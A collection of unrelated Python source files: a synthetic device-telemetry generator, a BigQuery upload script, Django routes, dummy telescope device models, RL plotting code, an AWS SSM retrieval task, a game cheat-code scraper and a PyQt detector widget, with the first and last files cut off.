'{time},{name},{deviceid},{devicetemp},{ambienttemp},{batterypercent},{gpsstatus},{bluetoothstatus},{wifistatus},{signalpercent},{cpuload},{ramusage},{latitude},{longitude}\n', 'Titanic' : '{time},{name},{deviceid},{devicetemp},{ambienttemp},{batterypercent},{gpsstatus},{bluetoothstatus},{wifistatus},{signalpercent},{cpuload},{ramusage},{latitude},{longitude}\n', } def createRowString(currentTimeString, pattern, name, deviceid, zipcode): ambienttemp = random.randrange(10,35) if name == "Sorrento F41L": # battery_level: % typical range: 20.0 - 80.0; values for Sorrento F41L phone should drop more quickly and be much lower on average) batterypercent = str(random.randrange(20, 75)) # cpu_usage: % (typical range: 10% - 70%); F41L phone should be ~ 20% higher than for any other model. cpuload = str(random.randrange(40,100)) # device_temp: celsius (typical range: ambient_temp times ~ 1.07; Sorrento F41L phone should be ambient_temp times ~ 1.4) devicetemp = int(float(ambienttemp) * random.uniform(1.2, 1.4)) else: batterypercent = str(random.randrange(20, 100)) # cpu_usage: % (typical range: 10% - 70%); F41L phone should be ~ 20% higher than for any other model. cpuload = str(random.randrange(0,70)) # device_temp: celsius (typical range: ambient_temp times ~ 1.07; Sorrento F41L phone should be ambient_temp times ~ 1.4) devicetemp = int(float(ambienttemp) * random.uniform(1.0, 1.07)) signalpercent = str(random.randrange(30,100)) ramusage = str(random.randrange(0,70)) # Make the device temp a delta devicetemp = devicetemp - ambienttemp # WiFi status: one of [disabled / enabled / connected]; should always be disabled for 10% of devices, and for the other 90% of devices, should be disabled 1% of the time. # If not disabled, there should be a 40% chance that the state is connected at any given moment. if random.randrange(0,9) == 0: wifistatus = "disabled" else: randomChoice = random.randrange(0, 99) if randomChoice < 1: wifistatus = "disabled" elif randomChoice < 40: wifistatus = "connected" else: wifistatus = "enabled" # Bluetooth status: one of [disabled / enabled / connected]. Should always be disabled for 20% of devices, and for the other 80% of devices, should be disabled 1% of the time. # If not disabled, there should be a 25% chance that the state is connected at any given moment. if random.randrange(0,9) < 2: bluetoothstatus = "disabled" else: randomChoice = random.randrange(0, 99) if randomChoice < 1: bluetoothstatus = "disabled" elif randomChoice < 25: bluetoothstatus = "connected" else: bluetoothstatus = "enabled" # GPS status: one of [disabled / enabled ]; should always be disabled for 5% of devices, and for the other 95% of devices, should be disabled 1% of the time. if random.randrange(0,99) < 5: gpsstatus = "disabled" else: randomChoice = random.randrange(0, 99) if randomChoice < 1: gpsstatus = "disabled" else: gpsstatus = "enabled" latitude = 0 longitude = 0 # Randomize the GPS location based on the account's zip code if gpsstatus == "enabled": zipbase = zipcode[:3] zipbaseAsInt = int(zipbase) if zipbase in zipCodeToLatLong: latitude, longitude = zipCodeToLatLong[zipbase] # Try one zipcode higher elif str(zipbaseAsInt + 1) in zipCodeToLatLong: latitude, longitude = zipCodeToLatLong[str(zipbaseAsInt + 1)] # Try one zipcode lower elif str(zipbaseAsInt - 1) in zipCodeToLatLong: latitude, longitude = zipCodeToLatLong[str(zipbaseAsInt - 1)] else: print "Couldn't find zipcode for " + zipbase latitude = float(latitude) + random.uniform(0.0, 0.5) longitude = float(longitude) + random.uniform(0.0, 0.5) return pattern.format(time=currentTimeString,name=name,ambienttemp=ambienttemp,batterypercent=batterypercent,signalpercent=signalpercent,cpuload=cpuload,deviceid=deviceid,devicetemp=devicetemp, ramusage=ramusage,latitude=latitude,longitude=longitude,wifistatus=wifistatus,bluetoothstatus=bluetoothstatus,gpsstatus=gpsstatus) numberOfDevices = 0 numberOfRows = 0 def createRows(accountDevices): global startingDate, numberOfDevices, numberOfRows i = 0 currentTimeString = startingDate.strftime('%Y-%m-%d:%H:%M:%S') for accountDevice in accountDevices: devicePattern = None deviceManufacturer = accountDevice.device.device_name.partition(' ')[0] devicePattern = devicePatterns[deviceManufacturer] if devicePattern is None: print "Device pattern not found for " + accountDevice.device.device_name row = createRowString(currentTimeString, devicePattern, accountDevice.device.device_name, accountDevice.account_device_id, accountDevice.account.zipcode) devicestatusfile.write(row) i += 1 if i % UPDATES_PER_SECOND == 0: startingDate = startingDate + datetime.timedelta(seconds=1) currentTimeString = startingDate.strftime('%Y-%m-%d:%H:%M:%S') numberOfDevices += 1 numberOfRows += 1 if numberOfRows % 100000 == 0: print "Output " + str(numberOfRows) + " rows so far for time " + startingDate.strftime('%Y-%m-%d:%H:%M:%S') zipCodeToLatLong = {} def readBaseStations(): #BaseStation.drop_table(fail_silently=True) #BaseStation.create_table() devicestatusfile = open(outputdirectory + "base_stations.tsv", "r") for line in devicestatusfile: station_num, zipcode, city, state, latitude, longitude = line.strip().split('\t') zipcodeBase = zipcode[:3] zipCodeToLatLong.update({zipcodeBase : [latitude, longitude]}) station_num = int(station_num) latitude = float(latitude) longitude = float(longitude) baseStation = BaseStation(station_num=station_num,zipcode=zipcode,city=city,state=state,latitude=latitude,longitude=longitude) baseStation.save(force_insert=True) devicestatusfile.close() #MostActiveStation.drop_table(fail_silently=True) #MostActiveStation.create_table() print "Writing out base stations" readBaseStations() print "Writing out device status" devicestatusfile = open(outputdirectory + "devicestatus.txt", "w") accountDevices = AccountDevice.select().join(Account).where( (Account.acct_close_dt >> None) & ((fn.Mod(Account.acct_num, 100) == 99) | (fn.Mod(Account.acct_num, 100) == 98) | (Account.acct_num == demoAccount)) ).order_by(fn.Rand()) for x in range(0, (60 * 3)): numberOfDevices = 0 createRows(accountDevices) devicestatusfile.close() print "Created " + str(numberOfRows) + " for " + str(numberOfDevices) + " devices"python/dump/load-data-by-POST.py import sys import json from apiclient.discovery import build from oauth2client.file import Storage from oauth2client.client import OAuth2WebServerFlow from oauth2client.tools import run import httplib2 # for python3 compat raw_input = vars(__builtins__).get('raw_input', input) FLOW = OAuth2WebServerFlow( client_id='xxxxxxx.apps.googleusercontent.com', client_secret='', scope='https://www.googleapis.com/auth/bigquery', user_agent='my-program-name/1.0') def loadTable(http, service): projectId = raw_input('Choose your project ID: ') datasetId = raw_input('Choose a dataset ID: ') tableId = raw_input('Choose a table name to load the data to: ') url = ('https://www.googleapis.com/upload/bigquery/v2/projects/' + projectId + '/jobs') newSchemaFile = raw_input('What is your schema? ') schema = open(newSchemaFile, 'r') # Create the body of the request, separated by a boundary of xxx newresource = ('--xxx\n' + 'Content-Type: application/json; charset=UTF-8\n' + '\n' + '{\n' + ' "configuration": {\n' + ' "load": {\n' + ' "schema": {\n' ' "fields": ' + schema.read() + '\n' + ' },\n' + ' "destinationTable": {\n' + ' "projectId": "' + projectId + '",\n' + ' "datasetId": "' + datasetId + '",\n' + ' "tableId": "' + tableId + '"\n' + ' }\n' + ' }\n' + ' }\n' + '}\n' + '--xxx\n' + 'Content-Type: application/octet-stream\n' + '\n') newDataFile = raw_input('What is your data? ') # Append data from the specified file to the request body f = open(newDataFile, 'r') newresource += f.read() # Signify the end of the body newresource += ('--xxx--\n') headers = {'Content-Type': 'multipart/related; boundary=xxx'} resp, content = http.request(url, method='POST', body=newresource, headers=headers) if resp.status == 200: jsonResponse = json.loads(content) jobReference = jsonResponse['jobReference']['jobId'] import time while True: jobCollection = service.jobs() getJob = jobCollection.get(projectId=projectId, jobId=jobReference).execute() currentStatus = getJob['status']['state'] if 'DONE' == currentStatus: print('Done Loading!') return else: print('Waiting to load...') print('Current status: ' + currentStatus) print(time.ctime()) time.sleep(10) def main(argv): # If the credentials don't exist or are invalid, run the native client # auth flow. The Storage object will ensure that if successful the good # credentials will get written back to a file. # # Choose a file name to store the credentials. storage = Storage('bigquery2.dat') credentials = storage.get() if credentials is None or credentials.invalid: credentials = run(FLOW, storage) # Create an httplib2.Http object to handle our HTTP requests # and authorize it with our good credentials. http = httplib2.Http() http = credentials.authorize(http) service = build('bigquery', 'v2', http=http) loadTable(http, service) if __name__ == '__main__': main(sys.argv) .config/zsh/site-functions/_make_parameters.py #compdef make_parameters.py _values "Defined parameter sets" $(grep -A1 "^@parameterset" make_parameters.py | sed -n 's/def \(.\+\)():/\1/p') kemalayhan/kinda-stackoverflow from django.contrib import admin from django.urls import path, include from django.views.generic import TemplateView from django.conf import settings from django.conf.urls.static import static from django.contrib.auth import views as auth_views urlpatterns = [ path('admin/', admin.site.urls), path( '', TemplateView.as_view(template_name="homepage.html"), name="homepage" ), path('users/', include('users.urls')), path('questions/', include('questions.urls')), path('tags/', include('tags.urls')), path('login/', auth_views.LoginView.as_view(), name="login"), path('logout/', auth_views.LogoutView.as_view(), name="logout"), ] if settings.DEBUG: urlpatterns += static( settings.MEDIA_URL, document_root=settings.MEDIA_ROOT ) bryankim96/psct-gui """Module for OPC UA device mirroring classes.""" from abc import abstractmethod import logging import threading import random import time from psct_gui_backend.device_models import BaseDeviceModel logger = logging.getLogger(__name__) class DummyDeviceModel(BaseDeviceModel): DEVICE_TYPE_NAME = "DummyDeviceModel" @abstractmethod def __init__(self, socketio_server=None): """Instantiate a DummyDeviceModel instance.""" super().__init__(socketio_server=socketio_server) self._id = "" self._name = "" self._type = self.DEVICE_TYPE_NAME self._position_info = {} self._data = {} self._errors = {} self._methods = [] @classmethod def create(cls, obj_node, opcua_client, *args, **kwargs): """Model class for OPC UA device models. Mirrors OPC UA objects (panels, MPES, etc.) as Python objects. Parameters ---------- obj_node : opcua.Node OPC UA node of the device to be mirrored. opcua_client : opcua.Client OPC UA Client instance connected to the alignment server. socketio_server : socketio.Server Socket.io Server instance used to connect to client browsers. sub_periods : (dict of str : int) Dictionary of node browse name : subscription period (ms) used to specify specific subscription periods for different data nodes. If not provided, the default subscription publish intervals will be used. """ subclasses = {subcls.TYPE_NODE_ID: subcls for subcls in DummyDeviceModel.__subclasses__()} type_node_id = obj_node.get_type_definition().to_string() if type_node_id in subclasses: model_class = subclasses[type_node_id] else: raise ValueError("Could not find DeviceModel type " "matching type_node_id: {}".format(type_node_id)) model = model_class(obj_node, opcua_client, *args, **kwargs) return model @property def data(self): """dict: Dictionary of data property names (str) and values.""" return self._data @property def errors(self): """dict: Dictionary of error property names (str) and values.""" return self._errors @property def methods(self): """list: List of method names.""" return self._methods @property def name(self): """str: Name of device.""" return self._name @property def id(self): """str: Unique device id.""" return self._id @property def type(self): """str: Name of this device's type.""" return self._type @property def position_info(self): """str: Name of this device's type.""" return self._position_info def set_data(self, name, value): self._data[name] = value def set_error(self, name, value): self._errors[name] = value # Calls an object method and returns its return value def call_method(self, method_name, *args): method_to_call = self._methods[method_name] return method_to_call(*args) def call_stop(self): self._stop() def _stop(self): pass def generate_dummy_data(self, type, name, mean=10.0, stddev=1.0, min_time=1.0, max_time=2.0): while True: if type == "data": type_dict = self._data elif type == "error": type_dict = self._errors else: raise ValueError("Invalid type {}".format(type)) if name in type_dict: type_dict[name] = random.gauss(mean, stddev) self._socketio_server.emit('data_change', { 'device_id': self.id, 'type': type, 'name': name, 'value': type_dict[name]}) logger.debug("Data change - {} : {} : {} : {}".format( self.id, type, name, type_dict[name])) time.sleep(random.uniform(min_time, max_time)) class DummyTelescopeModel(DummyDeviceModel): """Dummy model class for a telescope device.""" DEVICE_TYPE_NAME = "Telescope" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyMirrorModel(DummyDeviceModel): """Dummy model class for a mirror device.""" DEVICE_TYPE_NAME = "Mirror" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyPanelModel(DummyDeviceModel): """Dummy model class for a panel device.""" DEVICE_TYPE_NAME = "Panel" def __init__(self, panel_number, initial_data=None, socketio_server=None): super().__init__(socketio_server=socketio_server) logger.info("Creating dummy panel with ID {}".format(panel_number)) self.panel_number = panel_number if self.panel_number[0] == '1': self.mirror = 'primary' mirror_identifier = 'P' elif self.panel_number[0] == '2': self.mirror = 'secondary' mirror_identifier = 'S' self.ring_number = self.panel_number[2] if self.ring_number == '1': self.ring = 'inner' elif self.ring_number == '2': self.ring = 'outer' self.panel_type = mirror_identifier + self.ring_number self._position_info = { 'panel_number': self.panel_number, 'mirror': self.mirror, 'ring': self.ring, 'panel_type': self.panel_type } self._id = panel_number self._name = "Panel " + panel_number self._position_info = {} if initial_data: self._data = initial_data else: self._data = { 'State': 0, 'curCoords_x': -3.5, 'curCoords_y': 3.1, 'curCoords_z': 608.9, 'curCoords_xRot': -4.4, 'curCoords_yRot': -0.5, 'curCoords_zRot': 2.1, 'inCoords_x': -3.5, 'inCoords_y': 3.1, 'inCoords_z': 608.9, 'inCoords_xRot': -4.4, 'inCoords_yRot': -0.5, 'inCoords_zRot': 2.1, 'InternalTemperature': 20.84, 'ExternalTemperature': 34.81 } logger.info("Set initial data.") thread1 = threading.Thread(target=self.generate_dummy_data, args=("data", "InternalTemperature"), kwargs={'mean': 20.0}) thread1.daemon = True thread1.start() thread2 = threading.Thread(target=self.generate_dummy_data, args=("data", "ExternalTemperature"), kwargs={'mean': 34.0}) thread2.daemon = True thread2.start() logger.info("Started dummy data generation threads.") class DummyEdgeModel(DummyDeviceModel): """Dummy model class for an edge device.""" DEVICE_TYPE_NAME = "Edge" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyActuatorModel(DummyDeviceModel): """Dummy model class for an ACT device.""" DEVICE_TYPE_NAME = "Actuator" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyMPESModel(DummyDeviceModel): """Dummy model class for an MPES device.""" DEVICE_TYPE_NAME = "MPES" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyGASSystemModel(DummyDeviceModel): """Dummy model class for the GAS system.""" DEVICE_TYPE_NAME = "GAS System" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyPointingSystemModel(DummyDeviceModel): """Dummy model class for the telescope pointing system.""" DEVICE_TYPE_NAME = "Pointing System" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) class DummyPositionerModel(DummyDeviceModel): """Dummy model class for the telescope positioner.""" DEVICE_TYPE_NAME = "Positioner" def __init__(self, socketio_server=None): super().__init__(socketio_server=socketio_server) # Set of node ids for type nodes corresponding to all implemented DeviceModel # subclasses plus folder type nodes. DUMMY_DEVICE_MODEL_CLASSES = {subcls.__name__: subcls for subcls in DummyDeviceModel.__subclasses__()} costaware/utils/experiment_plotter.py import os import numpy as np import matplotlib.pyplot as plt from matplotlib.ticker import FuncFormatter import seaborn as sns from itertools import product sns.set_context("paper") sns.set_style("whitegrid") def load_experiment(directory, filename, r, c, dim, ql_cut=800000, ac_cut=500000): def load_condition(subdir): split = subdir.split('-') return split[0] == f"r{r}c{c}" and split[1] == f"{dim}x{dim}" experiment = next(subdir for subdir in os.listdir(directory) if load_condition(subdir)) q_learning = [] actor_critic = [] for exp_run in os.listdir(directory + "/" + experiment): ratios = np.load("/".join([directory, experiment, exp_run, f"{filename}.npy"])) actor = exp_run.split('-')[0] if actor == "LinearAC": actor_critic.append(ratios[:ac_cut]) elif actor == "TabularQ": q_learning.append(ratios[:ql_cut]) return np.array(q_learning), np.array(actor_critic) def title_generator(dim, r, c, agent): config = { "dimension": { 5: "Small", 10: "Medium", 20: "Large", }, "measure": { (2, 1): "Type-1", (3, 2): "Type-2", (4, 6): "Type-3", } } return " ".join([config["dimension"][dim], config["measure"][(r,c)], agent]) def sci_formatter(number, pos=None): string = f"{number:1.1e}" mantissa = string[:3] exponent = int(string[-2:]) return "$" + mantissa + "\\times 10^{" + str(exponent) + "}$" def percent_formatter(number, pos=None): return f"{number:0.1f}%" def plot_comparison_runs(fig, axes, q_learning, actor_critic, plot_runs=False, **kwargs): default_kwargs = { 'colors': ['r', 'b'], 'alpha': 0.15, 'linewidth': 0., } kwargs = {a: kwargs.get(a, b) for a, b in default_kwargs.items()} for i, dataset in enumerate([q_learning, actor_critic]): mean = dataset.mean(axis=0) std = dataset.std(axis=0) steps = np.arange(mean.size) if plot_runs: for run in dataset: axes[i].plot(steps, run, color='000000', alpha=0.2) axes[i].plot(steps, mean, color=kwargs['colors'][i]) axes[i].fill_between( steps, mean - std, mean + std, linewidth=kwargs['linewidth'], alpha=kwargs['alpha'], color=kwargs['colors'][i] ) axes[i].fill_between( steps, mean - 2 * std, mean + 2 * std, linewidth=kwargs['linewidth'], alpha=kwargs['alpha'], color=kwargs['colors'][i], ) return fig, axes def experiment1(): config = { "top directory" : "data/alg_comparisons", "filename" : "ratios", "reward-cost pairs" : [(2, 1), (3, 2), (4, 6)], "dimensions" : [10, 20], "cutoffs" : { "ql": [[100000, 800000, 500000], [60000, 3000000, 1000000]], "ac": [[100000, 400000, 500000], [250000, 200000, 100000]], }, "figsize" : (16, 12), "xlabel" : "Iterations", "ylabel" : "Ratio $\\rho$", } fig, axes = plt.subplots( 2 * len(config["dimensions"]), len(config["reward-cost pairs"]), figsize=config["figsize"], ) for d, dim in enumerate(config["dimensions"]): for i, (r, c) in enumerate(config["reward-cost pairs"]): ql_idx = (2*d, i) ac_idx = (2*d+1, i) axes[ql_idx].get_shared_y_axes().join(axes[ql_idx], axes[ac_idx]) q_learning, actor_critic = load_experiment( config["top directory"], config["filename"], r, c, dim, ac_cut=config["cutoffs"]['ac'][d][i], ql_cut=config["cutoffs"]['ql'][d][i] ) plot_comparison_runs( fig, [axes[ql_idx], axes[ac_idx]], q_learning, actor_critic, alpha=0., plot_runs=True,) for idx, label in zip([ql_idx, ac_idx], ["QL", "AC"]): axes[idx].set_title(title_generator(dim, r, c, label), fontsize=10) axes[idx].xaxis.set_major_formatter(FuncFormatter(sci_formatter)) axes[idx].yaxis.set_major_formatter(FuncFormatter( lambda number, pos=None: f"{number:1.1f}" )) axes[idx].set_ylabel(config["ylabel"]) axes[idx].set_xlabel(config["xlabel"]) plt.setp(axes[idx].xaxis.get_majorticklabels(), fontsize=8, rotation_mode="anchor", rotation=10, ha='right') sns.despine(ax=axes[idx]) plt.subplots_adjust(hspace=0.45) # for i in range(2): # axes[0,i].set_ylim(config["ylim"][i]) fig.savefig("plots/experiment1.jpg", bbox_inches="tight") def experiment2(): config = { "top directory" : "data/different_inits", "filename" : "ratios", "reward-cost pairs" : [(2, 1), (3, 2)], "dimensions" : [10], "cutoffs" : { "ql": [[40000, 800000]], "ac": [[120000, 120000]], }, "figsize" : (7, 5), "ylim" : [(0, 23), (0, 10)], "ylabel" : "Ratio $\\rho$", "xlabel" : "Iterations", } fig, axes = plt.subplots( 2 * len(config["dimensions"]), len(config["reward-cost pairs"]), figsize=config["figsize"], sharey='col', ) for d, dim in enumerate(config["dimensions"]): for i, (r, c) in enumerate(config["reward-cost pairs"]): ql_idx = (2*d, i) ac_idx = (2*d+1, i) q_learning, actor_critic = load_experiment( config["top directory"], config["filename"], r, c, dim, ac_cut=config["cutoffs"]['ac'][d][i], ql_cut=config["cutoffs"]['ql'][d][i] ) plot_comparison_runs( fig, [axes[ql_idx], axes[ac_idx]], q_learning, actor_critic, plot_runs=True, alpha=0. ) for idx, label in zip([ql_idx, ac_idx], ["QL", "AC"]): axes[idx].set_title(title_generator(dim, r, c, label), fontsize=10) axes[idx].xaxis.set_major_formatter(FuncFormatter(sci_formatter)) axes[idx].yaxis.set_major_formatter(FuncFormatter( lambda number, pos=None: f"{number:1.0f}" )) axes[idx].set_ylabel(config["ylabel"]) axes[idx].set_xlabel(config["xlabel"]) plt.setp(axes[idx].xaxis.get_majorticklabels(), fontsize=8, rotation_mode="anchor", rotation=10, ha='right') sns.despine(ax=axes[idx]) plt.subplots_adjust(hspace=0.45, wspace=0.2) for i, j in product(range(2), repeat=2): axes[i,i].set_ylim(config["ylim"][i]) fig.savefig("plots/experiment2.jpg", bbox_inches="tight") def experiment3(): config = { "top directory" : "data/mc_control", "filename" : "percent_time_in_goal", "reward-cost pairs" : [(4, 6)], "dimensions" : [5,10], "cutoffs" : { "ql": [[200000], [200000]], "ac": [[200000], [200000]], }, "figsize" : (7, 5), "ylim" : [(0, 40), (0, 20)], "ylabel" : "Percent spent in state $0$", "xlabel" : "Iterations", } fig, axes = plt.subplots( len(config["dimensions"]), 2, figsize=config["figsize"], sharey='col' ) for d, dim in enumerate(config["dimensions"]): for i, (r, c) in enumerate(config["reward-cost pairs"]): ql_idx = (i, d) ac_idx = (i+1, d) q_learning, actor_critic = load_experiment( config["top directory"], config["filename"], r, c, dim, ac_cut=config["cutoffs"]['ac'][d][i], ql_cut=config["cutoffs"]['ql'][d][i] ) plot_comparison_runs( fig, [axes[ql_idx], axes[ac_idx]], q_learning, actor_critic, plot_runs=True, alpha=0. ) for idx, label in zip([ql_idx, ac_idx], ["QL", "AC"]): axes[idx].set_title(title_generator(dim, r, c, label), fontsize=10) axes[idx].xaxis.set_major_formatter(FuncFormatter(sci_formatter)) axes[idx].yaxis.set_major_formatter(FuncFormatter(percent_formatter)) axes[idx].set_ylabel(config["ylabel"]) axes[idx].set_xlabel(config["xlabel"]) plt.setp(axes[idx].xaxis.get_majorticklabels(), fontsize=8, rotation_mode="anchor", rotation=10, ha='right') sns.despine(ax=axes[idx]) plt.subplots_adjust(hspace=0.5, wspace=0.4) for i in range(2): axes[0,i].set_ylim(config["ylim"][i]) fig.savefig("plots/experiment3.jpg", bbox_inches="tight") experiment1() experiment2() experiment3() 1-10 from prefect.tasks.secrets.base import SecretBase from prefect.utilities.aws import get_boto_client from prefect.utilities.tasks import defaults_from_attrs class AWSParametersManager(SecretBase): """ Task for retrieving values from AWS SSM Parameters Store and returning the parameter value. Note that all initialization arguments can optionally be provided or overwritten at runtime. For authentication, there are two options: you can set the `AWS_CREDENTIALS` Prefect Secret containing your AWS access keys, which will be passed directly to the `boto3` client, or you can [configure your flow's runtime environment](https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#guide-configuration) for `boto3`. Args: - parameter_name (str, optional): The name of the parameter to retrieve via SSM. - boto_kwargs (dict, optional): Additional keyword arguments to forward to the boto client. - **kwargs (dict, optional): Additional keyword arguments to pass to the Task constructor. """ def __init__(self, parameter_name: str = None, boto_kwargs: dict = None, **kwargs): self.parameter_name = parameter_name if boto_kwargs is None: self.boto_kwargs = {} else: self.boto_kwargs = boto_kwargs super().__init__(**kwargs) @defaults_from_attrs("parameter_name", "boto_kwargs") def run( self, parameter_name: str = None, credentials: str = None, boto_kwargs: dict = None, ) -> str: """ Task run method. Args: - parameter_name (str): The name of the parameter to retrieve from SSM. - credentials (dict, optional): Your AWS credentials passed from an upstream Secret task; this Secret must be a JSON string with two keys: `ACCESS_KEY` and `SECRET_ACCESS_KEY` which will be passed directly to `boto3`. If not provided here or in context, `boto3` will fall back on standard AWS rules for authentication. - boto_kwargs (dict, optional): Additional keyword arguments to forward to the boto client. Returns: - str: The parameter value, as a string. """ if parameter_name is None: raise ValueError("A parameter name must be provided.") ssm_client = get_boto_client("ssm", credentials=credentials, **boto_kwargs) parameter_response = ssm_client.get_parameter(Name=parameter_name) parameter_value = str(parameter_response["Parameter"]["Value"]) return parameter_value scrape.py0 #!/usr/bin/env python from bs4 import BeautifulSoup; import os; import sys; import tarfile; import tempfile; import time; import urllib.request # Change to the scripts location. Helps with running it through CRON. abspath = os.path.abspath(__file__); dname = os.path.dirname(abspath); os.chdir(dname); # URLs to scrape urls = { 'Wii': { 'fileName': 'wii', 'url': 'https://www.geckocodes.org/index.php?chid=R&r=*&l=all' }, 'WiiWare': { 'fileName': 'wii_ware', 'url': 'https://www.geckocodes.org/index.php?chid=W&r=*&l=all' }, 'Virtual Console Arcade': { 'fileName': 'virtual_console_arcade', 'url': 'https://www.geckocodes.org/index.php?chid=D&r=*&l=all' }, 'Wii Channels': { 'fileName': 'wii_channels', 'url': 'https://www.geckocodes.org/index.php?chid=H&r=*&l=all' }, 'Gamecube': { 'fileName': 'gamecube', 'url': 'https://www.geckocodes.org/index.php?chid=G&r=*&l=all' }, 'NES / Famicom': { 'fileName': 'n_e_s_famicom', 'url': 'https://www.geckocodes.org/index.php?chid=F&r=*&l=all' }, 'Super NES/Famicom': { 'fileName': 'super_n_e_s_famicom', 'url': 'https://www.geckocodes.org/index.php?chid=J&r=*&l=all' }, 'Nintendo 64': { 'fileName': 'nintendo_64', 'url': 'https://www.geckocodes.org/index.php?chid=N&r=*&l=all' }, 'Sega Master System': { 'fileName': 'sega_master_system', 'url': 'https://www.geckocodes.org/index.php?chid=L&r=*&l=all' }, 'Genesis/Mega Drive': { 'fileName': 'genesis_mega_drive', 'url': 'https://www.geckocodes.org/index.php?chid=M&r=*&l=all' }, 'NeoGeo': { 'fileName': 'neo_geo', 'url': 'https://www.geckocodes.org/index.php?chid=E&r=*&l=all' }, 'Commodore 64': { 'fileName': 'commodore_64', 'url': 'https://www.geckocodes.org/index.php?chid=C&r=*&l=all' }, 'MSX': { 'fileName': 'msx', 'url': 'https://www.geckocodes.org/index.php?chid=X&r=*&l=all' }, 'TurboGraFX-16': { 'fileName': 'turbo_gra_f_x_16', 'url': 'https://www.geckocodes.org/index.php?chid=P&r=*&l=all' }, 'TurboGraFX-CD': { 'fileName': 'turbo_gra_f_x_c_d', 'url': 'https://www.geckocodes.org/index.php?chid=Q&r=*&l=all' }, }; txtDownloadUrl = "https://www.geckocodes.org/txt.php?txt="; for url in urls: # Connect to the URL response = urllib.request.urlopen(urls[url]['url']); # If one of the pages doesn't load up successfully, just kill the program if response.code != 200: sys.exit(1); # Parse HTML and save to BeautifulSoup object soup = BeautifulSoup(response, "html.parser"); # Create a temporary directory tempDirectory = tempfile.TemporaryDirectory(); # Iterate through each of the games listed for link in soup.find("div", class_="list").findAll("a"): # Grab just the hyperlink, since thats all we are interested in cheatLink = link.get('href'); # Chop off the index.php part titleId = cheatLink.replace("./index.php?c=", ""); # Finally save the resulting text file response = urllib.request.urlretrieve(txtDownloadUrl + titleId, tempDirectory.name + "/" + titleId + ".txt"); # Put all of the newly downloaded files in to a tar.gz archive file tar = tarfile.open(urls[url]['fileName'] + ".tar.gz", "w:gz"); for name in os.listdir(tempDirectory.name): tar.add(tempDirectory.name + "/" + name, arcname=name); tar.close(); # Close the temp directory to clean up the files tempDirectory.cleanup(); # Just assume everything finished successfully and exit sys.exit(0); extra_foam/special_suite/gotthard_w.py """ Distributed under the terms of the BSD 3-Clause License. The full license is in the file LICENSE, distributed with this software. Author: <> Copyright (C) European X-Ray Free-Electron Laser Facility GmbH. All rights reserved. """ from string import Template import numpy as np from PyQt5.QtCore import Qt from PyQt5.QtGui import QDoubleValidator, QIntValidator from PyQt5.QtWidgets import QCheckBox, QSplitter from extra_foam.gui.ctrl_widgets.smart_widgets import ( SmartBoundaryLineEdit, SmartLineEdit, SmartSliceLineEdit, SmartStringLineEdit ) from extra_foam.gui.misc_widgets import FColor from extra_foam.gui.plot_widgets import ( HistMixin, ImageViewF, PlotWidgetF ) from .config import _MAX_N_GOTTHARD_PULSES, GOTTHARD_DEVICE from .gotthard_proc import ( GotthardProcessor, _DEFAULT_BIN_RANGE, _DEFAULT_N_BINS ) from .special_analysis_base import ( create_special, ClientType, _BaseAnalysisCtrlWidgetS, _SpecialAnalysisBase ) _MAX_N_BINS = 999 class GotthardCtrlWidget(_BaseAnalysisCtrlWidgetS): """Gotthard analysis control widget.""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.output_ch_le = SmartStringLineEdit( GOTTHARD_DEVICE.get(self.topic, "Gotthard:output")) self.ma_window_le = SmartLineEdit("1") validator = QIntValidator() validator.setBottom(1) self.ma_window_le.setValidator(validator) self.pulse_slicer_le = SmartSliceLineEdit(":") self.poi_index_le = SmartLineEdit("0") self.poi_index_le.setValidator( QIntValidator(0, _MAX_N_GOTTHARD_PULSES - 1)) self.bin_range_le = SmartBoundaryLineEdit(_DEFAULT_BIN_RANGE) self.n_bins_le = SmartLineEdit(str(_DEFAULT_N_BINS)) self.n_bins_le.setValidator(QIntValidator(1, _MAX_N_BINS)) self.hist_over_ma_cb = QCheckBox("Histogram over M.A. train") self.scale_le = SmartLineEdit("0") validator = QDoubleValidator() validator.setBottom(0) self.scale_le.setValidator(validator) self.offset_le = SmartLineEdit("0") self.offset_le.setValidator(QDoubleValidator()) self._non_reconfigurable_widgets = [ self.output_ch_le ] self.initUI() self.initConnections() def initUI(self): """Override.""" layout = self.layout() layout.addRow("Output channel: ", self.output_ch_le) layout.addRow("M.A. window: ", self.ma_window_le) layout.addRow("Pulse slicer: ", self.pulse_slicer_le) layout.addRow("P.O.I. (sliced): ", self.poi_index_le) layout.addRow("Bin range: ", self.bin_range_le) layout.addRow("# of bins: ", self.n_bins_le) layout.addRow("Scale (eV/pixel): ", self.scale_le) layout.addRow("Offset (eV): ", self.offset_le) layout.addRow("", self.hist_over_ma_cb) def initConnections(self): """Override.""" pass class GotthardAvgPlot(PlotWidgetF): """GotthardAvgPlot class. Visualize signals of the averaged pulse over a train as well as its moving average. """ def __init__(self, *, parent=None): super().__init__(parent=parent) self.setLabel('left', "ADU") self.setLabel('bottom', "Pixel") self.addLegend(offset=(5, 10)) self.setTitle("Averaged spectra over pulses") self._mean = self.plotCurve(name="Current", pen=FColor.mkPen("p")) self._mean_ma = self.plotCurve(name="Moving average", pen=FColor.mkPen("g")) def updateF(self, data): """Override.""" spectrum = data['spectrum_mean'] spectrum_ma = data['spectrum_ma_mean'] x = data["x"] if x is None: self.setLabel('bottom', "Pixel") x = np.arange(len(spectrum)) else: self.setLabel('bottom', "eV") self._mean.setData(x, spectrum) self._mean_ma.setData(x, spectrum_ma) class GotthardPulsePlot(PlotWidgetF): """GotthardPulsePlot class. Visualize signals of a single pulse as well as its moving average. """ def __init__(self, *, parent=None): super().__init__(parent=parent) self._idx = 0 self._updateTitle() self.setLabel('left', "ADU") self.setLabel('bottom', "Pixel") self.addLegend(offset=(5, 10)) self._poi = self.plotCurve(name="Current", pen=FColor.mkPen("p")) self._poi_ma = self.plotCurve(name="Moving average", pen=FColor.mkPen("g")) def _updateTitle(self): self.setTitle(f"Pulse of interest: {self._idx}") def updateF(self, data): """Override.""" idx = 